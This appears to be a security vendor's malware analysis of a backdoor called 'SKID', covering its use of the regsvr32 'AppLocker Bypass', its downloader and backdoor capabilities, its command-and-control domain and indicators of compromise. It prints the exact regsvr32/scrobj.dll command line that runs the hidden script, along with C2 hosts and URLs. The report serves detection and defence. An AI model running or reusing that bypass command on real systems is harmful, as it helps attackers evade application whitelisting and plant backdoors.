Analyzing a Customer EndPoint, we identified a new threat that expolits a recent exploit S.O. Micorosft Windows technique, discovered on April 2016 and called “Applocker Bypass“.
We called this threat “SKID“, because inside the code there are a lot of keywords with this name.
Indicators of Compromise to detect compromised EndPoint are advertised.
APPLOCKER BYPASS – EXPLOITING TECHNIQUES
The new threat, identified as “SKID” uses a recent exploit S.O. Windows technique called “Applocker Bypass“; thanks to this technique it is possible to execute VB or JS scripts using the system process regsvr32.exe.
This exploit technique, discovered on April 2016, is detailed documented on this links:
“SKID” uses the following command line to been activated:
regsvr32.exe /s /n /u /i:”C:\Users\[username]\AppData\Roaming\9DB0F2C13D.txt” scrobj.dll
The analyzed file has the following details:
File name: 9DB0F2C13D.txt
File path: C:\Users\[username]\AppData\Roaming\
File size: 14646 Bytes
From the first lines on the header file it is possibile to notice that it’s a Jascript script, but this code appears hidden.
Revealing the code, we obtained these evidences:
- There is a function that check the Internet connection, making an http request to update.microsoft.com host
- The Backdoor executes http GET request to 18.104.22.168 host
- It reads the registry key HKEY_CURRENT_USER\Software\Microsoft\Notepad\<username> in which we can find references to the installed Backdoor
- It verifies if the threat is alredy installed, checking through WMI if the regsvr32 process is in execution
This first file appears to be a real downloader, created ad-hoc to exploit the exploiting technique described.
File name: changelog.txt
Downloaded from: hxxps://webmail.xcloud.kz/js/changelog.txt
File size: 43686 Bytes
As the first file, also for this, the header is very similar.
The Backdoor is able to obtain the following information:
- Operating System and Architecture (32 o 64 bit)
- It recognizes if on the system is installed or in execution one of the following antivirus:
- Windows Defender
- 360 Total Security
- Seqrite EndPoint Security
- Quick Heal
- Bitdefender Endpoint Security
- Computer serial number
- Local computer IP
- Backdoor installed version (during the analysis it was v2.0)
With this Backdoor the attacker can execute the following tasks:
- Binary files download and execution (.exe and .dll)
- Sciprt .js or .vbs download using the exploiting “AppLocker Bypass” technique
- Threat removal from victim PC
- Remote command execution on victim PC
CnC – DOMAIN ANALYSIS
The CnC identified is the following:
The domain xcloud.kz has been registred on November 2016, the 15 and, also the SSL webmail.xcloud.kz host certificate is valid from the 15th November 2016 to the 16th November 2017.
From these evidences it’s possible to speculate that the attacker had implemented and distributed the Backdoor’s firsts versions on the end of 2016.
INDICATORS OF COMPROMISE
The helpful IoC to investigate and verify if the threat can be identified on further EndPoint are the following:
– NETWORK ACTIVITY
CnC IP: 22.214.171.124
CnC hostname: webmail.xcloud.kz
CnC URL: hxxps://webmail.xcloud.kz/js/ajax.php
Comportamento anomalo: connessioni in uscita verso 126.96.36.199 (Google IP) su porta 80, protocollo HTTP
– REGISTRY KEYS